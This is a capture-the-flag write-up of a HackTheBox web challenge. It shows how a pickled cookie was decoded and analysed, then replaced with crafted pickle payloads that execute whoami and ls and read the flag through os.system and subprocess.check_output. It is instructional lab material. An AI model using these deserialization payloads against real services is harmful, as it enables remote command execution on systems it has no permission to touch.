Baby website rick

8 December 2020

This write-up describes the challenge "baby website rick", part of the easy track OWASP Top 10 of the HackTheBox platform.

Getting a lead

The first piece of information we are given is an IP address leading to a website. The site is named "insecure deserialization", so there's our first hint. The website does not contain any buttons or forms and does not communicate with any API in the background. It only displays this cryptic message:

Don't play around with this serum morty!! <main.anti_pickle_serum object at 0x7f8a85c50850>

If we take a look at the HTTP headers, we can see that the server is Werkzeug/1.0.1 Python/2.7.17. So we know the server is running Python.

Werkzeug is a comprehensive WSGI web application library. It began as a simple collection of various utilities for WSGI applications and has become one of the most advanced WSGI utility libraries.

The first time we connect to the application, a cookie named plan_b is set. This cookie is then sent with every request made to the site.

plan_b
KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu

This cookie clearly looks like it is base64-encoded. If we decode it, here is what we get:

(dp0
S'serum'
p1
ccopy_reg
_reconstructor
p2
(c__main__
anti_pickle_serum
p3
c__builtin__
object
p4
Ntp5
Rp6
s.
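The decoding step can be reproduced with a few lines of Python. This is a minimal sketch: the names COOKIE and decoded are only illustrative, and the value is the plan_b cookie shown above.

```python
import base64

# Value of the plan_b cookie, copied from the browser.
COOKIE = (
    "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwph"
    "bnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
)

decoded = base64.b64decode(COOKIE)

# The decoded bytes are plain ASCII here, so they can be printed as text.
print(decoded.decode("ascii"))
```

Decoding is harmless on its own: nothing is deserialized at this point, we are only looking at bytes.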

Things are getting interesting: we are seeing a reference to anti_pickle_serum again, but what could this mean?

We're in a pickle

The challenge is clearly hinting at a deserialization vulnerability, so the cookie could hold a serialized object. If we search for "insecure deserialization" on DuckDuckGo, the first result we get is a post explaining how insecure deserialization works with Python and a library called pickle. The server is running Python and the whole challenge has very strong references to the Pickle Rick episode, so I'd say we are on the right track. Let's dig deeper...

The first thing we want to validate is that the cookie plan_b really is an object serialized with pickle. To do so, let's adapt the Python code we found when looking for "insecure deserialization" and take a look at the serialization:

import os
import _pickle

class Exploit(object):
    def __reduce__(self):
        # pickle stores this (callable, args) pair and calls it when the object is loaded
        return os.system, ('pwd',)

def serialize_exploit():
    shellcode = _pickle.dumps(Exploit())
    return shellcode

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print(shellcode)

The result is \x80\x03cposix\nsystem\nq\x00X\x03\x00\x00\x00pwdq\x01\x85q\x02Rq\x03. (the final dot is part of the pickle). It doesn't look at all like the serialization we were looking at earlier. But wait, if we take a closer look at the pickle documentation, we can see that there are multiple serialization formats called "protocols". We can choose the protocol when we perform the serialization, for example _pickle.dumps(Exploit(), protocol=2).

The example I copied from was using _pickle, which is the C implementation behind the pickle module; importing pickle directly works just as well. Also, I am using Python 3.4 in this example whereas the server runs Python 2.7. That's a mistake on my part.

After trying every protocol, here is the result for protocol=0:

cposix\nsystem\np0\n(Vpwd\np1\ntp2\nRp3\n.

It does look a lot like our cookie now! We can be fairly confident that the cookie is a pickle serialized with protocol 0.
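Trying every protocol by hand gets tedious, so here is a minimal sketch that dumps the same object once per protocol. It assumes Python 3 and the standard pickle module; the name dumps_by_protocol is only illustrative.

```python
import os
import pickle


class Exploit(object):
    def __reduce__(self):
        # Only recorded at dump time; nothing runs until the pickle is loaded.
        return os.system, ("pwd",)


# Serialize the same object once per protocol supported by this interpreter.
dumps_by_protocol = {
    proto: pickle.dumps(Exploit(), protocol=proto)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1)
}

for proto, data in dumps_by_protocol.items():
    print(proto, data)
```

Protocol 0 is the only one that produces a purely textual, newline-separated output, which is what makes it easy to recognize in the decoded cookie.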

Getting a feel of the server side

How about we try to pass in some deserialization exploits now? Unfortunately when we try to copy and paste some basic exploits, nothing works at this point. Fair enough, we're gonna have to invest some more time into understanding what the deserialized object really looks like.

The first thing we can do is try to understand protocol 0 and the fields of the serialized object. There is no need to look for a specification: the Python standard library ships a module named pickletools that helps us take apart a file serialized with pickle. First we put our decoded cookie in a file named fpickle, then we run pickletools on it:

python3 -m pickletools fpickle
    0: (    MARK
    1: d        DICT       (MARK at 0)
    2: p    PUT        0
    5: S    STRING     'serum'
   14: p    PUT        1
   17: c    GLOBAL     'copy_reg _reconstructor'
   42: p    PUT        2
   45: (    MARK
   46: c        GLOBAL     '__main__ anti_pickle_serum'
   74: p        PUT        3
   77: c        GLOBAL     '__builtin__ object'
   97: p        PUT        4
  100: N        NONE
  101: t        TUPLE      (MARK at 45)
  102: p    PUT        5
  105: R    REDUCE
  106: p    PUT        6
  109: s    SETITEM
  110: .    STOP
highest protocol among opcodes = 0

So basically, it looks like our object is a dictionary with one item, "serum". Its value is produced by the REDUCE opcode, which calls copy_reg._reconstructor with the tuple (anti_pickle_serum, object, None).

Use python3 -m pickletools -a fpickle to get annotations that help in understanding the format.
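The same module can also be used from a script. The sketch below relies on pickletools.genops to list the names a pickle would import, without loading it; the helper name referenced_globals is made up for this example.

```python
import base64
import pickletools

# Value of the plan_b cookie, copied from the browser.
COOKIE = (
    "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwph"
    "bnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
)


def referenced_globals(data):
    """Return the 'module name' strings of every GLOBAL opcode, without unpickling."""
    # Note: protocol 4 and later use STACK_GLOBAL instead, which this sketch ignores.
    return [
        arg
        for opcode, arg, _position in pickletools.genops(data)
        if opcode.name == "GLOBAL"
    ]


cookie_globals = referenced_globals(base64.b64decode(COOKIE))
print(cookie_globals)
```

This is a safe way to look at an untrusted pickle, since genops only parses the opcodes and never calls anything.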

Well, that kind of helped, but not that much, so how about deserializing the cookie?

import _pickle
import base64

if __name__ == '__main__':
    encoded_string = "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized)

When we try this, we get the following error:

AttributeError: Can't get attribute 'anti_pickle_serum' on <module '__main__' from 'deserialize.py'>

It looks like pickle is expecting an attribute named anti_pickle_serum in the __main__ module. Okay, how about we give it one?

import _pickle
import base64

if __name__ == '__main__':
    anti_pickle_serum = "magnolia"
    encoded_string = "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized)

Now we get a new error:

  File "[redacted]/lib/python3.6/copyreg.py", line 43, in _reconstructor
    obj = object.__new__(cls)
TypeError: object.__new__(X): X is not a type object (str)

This error is actually extremely interesting. First, we learn that anti_pickle_serum should not be a string but a class (a "type object"). Second, we rediscover some keywords that were in our serialized object: copyreg is the Python 3 name of the Python 2 module copy_reg, and _reconstructor has kept the same name. We should take a look at the file copyreg.py and its function _reconstructor:

def _reconstructor(cls, base, state):
    if base is object:
        obj = object.__new__(cls)
    else:
        obj = base.__new__(cls, state)
        if base.__init__ != object.__init__:
            base.__init__(obj, state)
    return obj

So the function tries to create a new instance of the parameter cls. If we put a breakpoint where the object is being created and relaunch our script, we see that cls holds our string magnolia. So the deserializer is trying to instantiate whatever is bound to the name anti_pickle_serum.
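To get a feel for this behaviour, we can call the function directly. This is only a sketch: _reconstructor is a private helper of the copyreg module, and the Serum class is a made-up stand-in.

```python
import copyreg


class Serum(object):
    def __init__(self):
        # Not reached through _reconstructor, which bypasses __init__ here.
        self.initialized = True


# Same kind of call the REDUCE opcode performs with the tuple (cls, base, state).
obj = copyreg._reconstructor(Serum, object, None)
print(type(obj).__name__, hasattr(obj, "initialized"))

# Passing a string instead of a class reproduces the error seen earlier.
try:
    copyreg._reconstructor("magnolia", object, None)
except TypeError as exc:
    error = str(exc)
    print(error)
```

With a class, we get an instance back without __init__ ever being called; with a string, object.__new__ refuses to build anything.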

From everything we've seen so far, in the next try we should bind anti_pickle_serum to a class.

import _pickle
import base64


class Magnolia(object):
    def __reduce__(self):
        return print, ("Hello", )


if __name__ == '__main__':
    anti_pickle_serum = Magnolia
    encoded_string = "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized)

This code is a double success. First we are not getting any errors, and second, the output is:

{'serum': <__main__.Magnolia object at 0x7fc3dcd0c080>}

This bloody looks like the string displayed on the website! At this point we can say we came pretty close to what is happening on the server side. Here is an estimation of the code used on the server:

    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized["serum"])
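As a side note on the local experiments above, defining a module-level anti_pickle_serum is not the only way to make the cookie load. A minimal sketch, assuming Python 3, is to subclass pickle.Unpickler and override find_class so that the missing name resolves to a local stand-in. The names StandInSerum, CookieUnpickler and load_cookie are made up for this example.

```python
import base64
import io
import pickle

# Value of the plan_b cookie, copied from the browser.
COOKIE = (
    "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwph"
    "bnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
)


class StandInSerum(object):
    """Hypothetical local replacement for the server's anti_pickle_serum."""


class CookieUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Redirect the one name that only exists on the server.
        if (module, name) == ("__main__", "anti_pickle_serum"):
            return StandInSerum
        # copy_reg and __builtin__ go through the default lookup, which maps
        # the Python 2 module names to their Python 3 equivalents.
        return super().find_class(module, name)


def load_cookie(value):
    """Decode and unpickle a cookie value with the redirected lookup."""
    return CookieUnpickler(io.BytesIO(base64.b64decode(value))).load()


cookie = load_cookie(COOKIE)
print(cookie)
```

The result has the same shape as before: a dictionary with a single "serum" key holding an instance of the stand-in class.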

Crafting the exploit

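From all the intelligence we have gathered, we should be able to craft a proof of concept exploit now. In this first attempt we hope to execute whoami on the server and get the response, which should be root or a username. Note that cPickle only exists in Python 2, so this script has to be run with Python 2, which also matches the server: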

import os
import cPickle
from base64 import b64encode


class Exploit(object):
    def __reduce__(self):
        return os.system, ('whoami',)


if __name__ == '__main__':
    shellcode = cPickle.dumps({"serum": Exploit()}, protocol=0)
    print(shellcode)
    print(b64encode(shellcode))

This gives us the following payload (which is the content of the cookie):

plan_b
KGRwMQpTJ3NlcnVtJwpwMgpjcG9zaXgKc3lzdGVtCnAzCihTJ3dob2FtaScKcDQKdHA1ClJwNgpzLg==

Unfortunately this doesn't print root or any username. Instead we get this:

Don't play around with this serum morty!! 0

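The 0 we are seeing is the return value of os.system, which is the exit status of the whoami command and not its output. The output itself goes to the server's standard output, where we cannot see it. So we need a callable that returns the output of the command it executes; we use subprocess.check_output to do so: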
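The difference between the two callables can be reproduced locally with harmless commands. This is a sketch under a few assumptions: it runs on Python 3, the class names ViaSystem and ViaCheckOutput are made up, and "echo hi" is used as a stand-in for the real command.

```python
import os
import pickle
import subprocess
import sys


class ViaSystem(object):
    def __reduce__(self):
        # os.system returns the exit status; the command output goes to stdout.
        return os.system, ("echo hi",)


class ViaCheckOutput(object):
    def __reduce__(self):
        # check_output returns the captured output of the command as bytes.
        return subprocess.check_output, ([sys.executable, "-c", "print('hi')"],)


# Loading the pickle is what triggers the call; the result replaces the object.
status = pickle.loads(pickle.dumps(ViaSystem(), protocol=0))
output = pickle.loads(pickle.dumps(ViaCheckOutput(), protocol=0))

print(repr(status), repr(output))
```

Whatever the callable returns becomes the deserialized value, and that value is what the server ends up printing on the page.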

import subprocess
import cPickle
from base64 import b64encode


class Exploit(object):
    def __reduce__(self):
        return subprocess.check_output, (['whoami'], )


if __name__ == '__main__':
    shellcode = cPickle.dumps({"serum": Exploit()}, protocol=0)
    print(shellcode)
    print(b64encode(shellcode))

This gives us the following payload:

KGRwMQpTJ3NlcnVtJwpwMgpjc3VicHJvY2VzcwpjaGVja19vdXRwdXQKcDMKKChscDQKUyd3aG9hbWknCnA1CmF0UnA2CnMu

Let's execute it and see... who am I? And the result is:

Don't play around with this serum morty!! nobody

So it appears I am nobody. If we try ls -l we get the listing for the files in the current directory:

-rw-r--r--    1 root     root           637 Nov  2 15:53 app.py
-rw-r--r--    1 root     root            58 Nov  2 15:53 flag_wIp1b
drwxr-xr-x    3 root     root          4096 Nov  2 15:53 static
drwxr-xr-x    2 root     root          4096 Nov  2 15:53 templates

To solve the challenge, we just have to display the flag with cat flag_wIp1b. This concludes the write-up for this challenge!